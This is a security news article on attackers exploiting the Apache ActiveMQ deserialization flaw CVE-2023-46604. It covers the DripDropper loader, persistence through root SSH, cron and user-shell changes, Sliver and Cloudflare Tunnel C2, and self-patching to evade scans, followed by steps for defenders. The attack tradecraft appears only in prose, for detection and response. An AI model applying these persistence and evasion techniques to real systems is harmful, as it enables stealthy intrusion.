Hackers Exploit ActiveMQ Flaw, Patch Servers to Stay Hidden

Attackers use CVE-2023-46604 to breach Linux cloud hosts, drop “DripDropper” malware, and quietly fix the flaw to lock in access, researchers say.

Threat actors are abusing a two-year-old Apache ActiveMQ remote-code-execution bug (CVE-2023-46604) to compromise cloud Linux systems, deploy a loader dubbed DripDropper, and then patch the very vulnerability used for entry. The self-patching move reduces noise in scans and crowds out rival intruders, according to Red Canary. Red CanaryNVD

SAN FRANCISCO — Aug. 19, 2025. Attackers are actively exploiting CVE-2023-46604, a critical Apache ActiveMQ OpenWire deserialization flaw (CVSS 10.0), to gain shell access on Linux servers before installing new malware and applying an official patch to conceal their entry point, threat hunters reported Tuesday. NVDRed Canary

Exploit vector: CVE-2023-46604 (CVSS 10.0), an unauthenticated deserialization bug in ActiveMQ’s OpenWire protocol, enables arbitrary command execution on targeted brokers or clients.

Observed tooling: Attackers deploy DripDropper, a PyInstaller-packed ELF loader that communicates with Dropbox APIs using embedded OAuth tokens, allowing staging of further payloads.

Persistence measures: Intruders enable root SSH login by modifying sshd_config, alter cron jobs (editing /etc/cron.* entries like 0anacron), and change default Linux user shells (e.g., switching the “games” user to /bin/sh).

Post-exploitation patching: Attackers fetch patched JARs directly from Apache Maven (repo1.maven.org), replacing vulnerable components to eliminate scanner-detectable artifacts while maintaining persistence via backdoors.

C2 infrastructure: Campaigns use Sliver C2 frameworks and Cloudflare Tunnels, blending malicious traffic with legitimate encrypted flows.

“It may seem counterintuitive… but it’s a great way to lock out other adversaries and obscure the initial access technique,” Red Canary’s Christina Johns, Chris Brook and Tyler Edmonds wrote. Red Canary

“Patching the vulnerability does not disrupt their operations as they already established other persistence mechanisms,” the researchers added. Red Canary

Apache advises: “Users of both ActiveMQ Classic and ActiveMQ Artemis brokers are recommended to upgrade.” activemq.apache.org

Technical analysis

Vulnerability mechanics. CVE-2023-46604 abuses unbounded deserialization in the Java OpenWire marshaller. A network-adjacent attacker can coerce a broker or client to instantiate arbitrary classes and execute shell commands. Affected 5.x/6.x lines were fixed in 5.15.16 / 5.16.7 / 5.17.6 / 5.18.3 and later. NVDactivemq.apache.org

Kill chain observed. Red Canary saw reconnaissance across dozens of cloud-hosted Linux endpoints, exploit of the RCE, then: enabling root SSH login via sshd_config; dropping DripDropper; creating cron-based persistence (editing 0anacron in /etc/cron.*); and modifying the “games” user’s login shell to /bin/sh for fallback access. Finally, attackers fetched patched JARs from repo1.maven.org to close CVE-2023-46604. Red Canary

Command-and-control. DripDropper communicates with Dropbox using a hard-coded bearer token; separate C2 was observed via Sliver and Cloudflare Tunnels, blending into legitimate traffic. Red Canary

Impact & response

Who’s affected: Any organization exposing vulnerable ActiveMQ brokers/clients—especially in cloud Linux environments used by CI/CD, microservices, or messaging pipelines. Historical abuse of this bug includes ransomware and cryptomining crews, raising the risk of lateral movement and data theft. Red CanaryTrend MicroRapid7

Immediate actions:

1. Verify provenance of patches. Confirm who applied the fix and when; don’t rely solely on a “clean” scan given the self-patch tactic. Red Canary
2. Upgrade to a fixed version of ActiveMQ and restart services to load new JARs. activemq.apache.org
3. Hunt for persistence: check sshd_config (root login), unexpected cron entries (e.g., 0anacron edits), anomalous users or shell changes (e.g., games account), and outbound traffic to Dropbox/Sliver/Cloudflare Tunnels. Red Canary
4. Rotate credentials and review access tokens and API keys on affected hosts.
5. Restrict exposure: put brokers behind VPNs or allow-lists; prefer mutual TLS; segment from crown-jewel networks.

Background and trendlines

CVE-2023-46604 has been widely exploited since disclosure, with reports tying it to Kinsing cryptominers and ransomware families such as TellYouThePass, HelloKitty, and Ransomhub. Red Canary notes the self-patching tactic echoes other campaigns where intruders “fix” entry points to evade scans and monopolize access. Trend MicroRed Canary

Notably, Apache ActiveMQ also saw a 2025 DoS-class issue (CVE-2025-27533) affecting multiple branches—underscoring the need for continuous maintenance even as old RCEs remain favored by attackers. NVD

“This attack illustrates a dangerous new phase in exploitation. By patching the very hole they used, adversaries are not only evading defenders’ scanners but also effectively claiming ‘ownership’ of the compromised host. For defenders, a patched system no longer equates to a clean system,” said El Mostafa Ouchen, cybersecurity author and consultant. “In my view, organizations must treat every post-exploitation patch scenario as a full breach requiring deep forensic validation — otherwise, they are leaving sophisticated backdoors untouched.”

Conclusion

The DripDropper campaign is a reminder that patching ≠ clean: an up-to-date broker can still hide entrenched adversaries. Treat exploitation of CVE-2023-46604 as a potential full-environment compromise, validate patch provenance, and expand hunts to persistence, credentials, and egress pathways. Red Canary